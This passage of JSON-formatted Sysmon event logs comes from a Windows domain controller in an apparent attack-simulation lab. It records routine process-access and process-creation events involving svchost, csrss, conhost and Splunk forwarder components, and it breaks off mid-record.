{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6520,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6521,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6522,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6523,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21DC-5F25-0000-0010DB1E0A00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21DC-5F25-0000-0010DB1E0A00}","TargetProcessId":"2152","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6524,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.399\r\nProcessGuid: {41C8662E-21DD-5F25-0000-0010BC200A00}\r\nProcessId: 3252\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.399","ProcessGuid":"{41C8662E-21DD-5F25-0000-0010BC200A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6525,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21DD-5F25-0000-0010BC200A00}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21DD-5F25-0000-0010BC200A00}","TargetProcessId":"3252","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6526,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21DD-5F25-0000-0010BC200A00}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21DD-5F25-0000-0010BC200A00}","TargetProcessId":"3252","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6527,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6528,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 